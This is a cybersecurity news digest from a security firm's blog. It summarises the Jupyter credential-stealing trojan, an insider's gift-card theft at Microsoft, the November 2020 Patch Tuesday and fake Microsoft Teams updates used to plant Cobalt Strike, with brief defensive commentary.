CYBERSECURITY NEWS V. 19.11 – Jupyter malware, Microsoft Patch Tuesday, Microsoft engineer stole $10 million

hexway cybersecurity blog brings you the latest news about attacks and data breaches, emerging malware, and vendor security updates with comments from our experts

News for discussion

New Jupyter malware steals credentials from Chrome, Firefox, and Chromium

The Jupyter Trojan is used to steal usernames, passwords, and other sensitive data and create a permanent backdoor on the compromised systems. The Trojan was first detected in the network of an American university in May 2020. Jupyter attacks are aimed primarily at data from browsers like Chrome, Firefox, and Chromium. The Jupyter installer disguises itself as a zipped file, often with an MS Office icon or filenames that look like they have to be opened urgently. Once running, it will install legal tools to hide downloads and install malware into temporary folders of the compromised system in the background. Upon installation, it gradually starts stealing various types of data: usernames, passwords, autocomplete data in browsers, browsing history, and cookies. Then, it sends the data to the command and control server.

hexway commentary:

It was 2020, and users were still launching attachments from suspicious emails and installing malware on their computers.

As our practice of phishing campaigns shows (within the framework of RedTeam, for example), even the users who have recently undergone cybersecurity training still click on suspicious links and launch unfamiliar files from attachments.

So, training is undoubtedly beneficial, but without technical measures, it is useless. Administrators must configure spam lists and antiviruses and limit the rights of users.

News FYI

Microsoft engineer stole $10 million worth of gift cards, gets 9 years of prison

In the summer of 2019, the US authorities brought charges against a former Microsoft employee. Vladimir Kvashuk, a Ukrainian citizen, stole about $10 million from the company. Kvashuk worked at Microsoft from 2016 to 2018. He took advantage of Microsoft's online retail testing program, stole Microsoft currency stored value, namely gift cards, to resell them online. To hide his traces, Kvashuk used mixing services to launder cryptocurrency that went to his bank and investment accounts. This week, Kvashuk was sentenced to 9 years in prison on multiple charges and ordered to pay $8,3 million in damages.

Microsoft November 2020 Patch Tuesday

On November 10, Microsoft released its monthly security updates. They address 112 vulnerabilities in various Microsoft products, 23 of which are RCEs. The release also includes a patch for a Windows kernel zero-day vulnerability (CVE-2020-17087) actively exploited by cybercriminals. Other issues affected Excel, Microsoft Sharepoint, Microsoft Exchange Server, Windows Network File System, Windows GDI + component, Windows Print Spooler service, and even Microsoft Teams.

Cobalt Strike installation disguised as Microsoft Teams updates

Ransomware operators use malicious ads to distribute fake Microsoft Teams updates, infect systems with backdoors, and install Cobalt Strike beacons to compromise networks. In one attack, hackers bought ads on a search engine, causing the early search results for Microsoft Teams software to point to a domain under their control. By clicking the link, users would load a payload that runs a PowerShell script to download more malicious content. The malware also installed a legitimate copy of Microsoft Teams on the system so that the victims would not suspect anything. In most cases, the original payload was Predator the Thief info stealer. The malware also downloaded Cobalt Strike beacons, allowing attackers to roam the victim network. In some attacks, the final stage was to launch malware to encrypt files on the network's computers.